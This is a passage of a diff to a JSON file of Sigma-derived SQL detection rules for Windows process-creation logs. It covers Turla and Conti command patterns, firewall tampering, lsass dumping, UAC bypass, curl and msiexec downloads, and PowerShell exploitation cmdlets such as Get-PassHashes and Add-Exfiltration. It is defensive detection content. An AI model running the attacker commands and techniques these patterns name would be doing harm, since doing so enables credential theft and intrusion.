NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "New Firewall Rule Added Via Netsh.EXE", - "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "title": "Potential Arbitrary DLL Load Using Winword", + "id": "f7375e28-5c14-432f-b8d1-1db26c832df3", "status": "test", - "description": "Detects the addition of a new rule to the Windows firewall via netsh", - "author": "Markus Neis, Sander Wiebing", + "description": "Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1202" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_add_rule.yml" + "filename": "proc_creation_win_office_winword_dll_load.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "title": "MsiExec Web Install", + "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_msiexec_web_install.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", - "status": "test", - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "status": "experimental", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027.005" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Firewall Disabled via Netsh.EXE", - "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", - "status": "test", - "description": "Detects netsh commands that turns off the Windows firewall", - "author": "Fatih Sirin", + "title": "WSL Child Process Anomaly", + "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", + "status": "experimental", + "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.004", - "attack.s0108" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_fw_disable.yml" + "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "title": "IIS Native-Code Module Command Line Installation", + "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "description": "Detects suspicious IIS native-code module installations via command line", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "title": "Use of TTDInject.exe", + "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "proc_creation_win_lolbin_ttdinject.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", - "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "status": "test", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "tags": [ "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", - "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.t1489" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", - "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", - "status": "experimental", - "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", - "author": "Sreeman", + "title": "Suspicious Tasklist Discovery Command", + "id": "63332011-f057-496c-ad8d-d2b6afb27f96", + "status": "test", + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", + "author": "frack113", "tags": [ - "attack.t1204", - "attack.t1566.001", - "attack.execution", - "attack.initial_access" + "attack.discovery", + "attack.t1057" ], "falsepositives": [ - "Unknown" + "Administrator, hotline ask to user" ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%tasklist%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR OriginalFileName = 'tasklist.exe'))" ], - "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" + "filename": "proc_creation_win_tasklist_basic_execution.yml" }, { - "title": "Procdump Execution", - "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", - "status": "experimental", - "description": "Detects usage of the SysInternals Procdump utility", - "author": "Florian Roth (Nextron Systems)", + "title": "Domain Trust Discovery Via Dsquery", + "id": "3bad990e-4848-4a78-9530-b427d854aac0", + "status": "test", + "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", + "author": "E.M. Anhaus, Tony Lambert, oscd.community, omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Legitimate use of procdump by a developer or administrator" + "Legitimate use of the utilities by legitimate user for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_procdump.yml" + "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", - "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "title": "Use Of The SFTP.EXE Binary As A LOLBIN", + "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "status": "experimental", + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1218" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "proc_creation_win_lolbin_sftp.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", - "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' 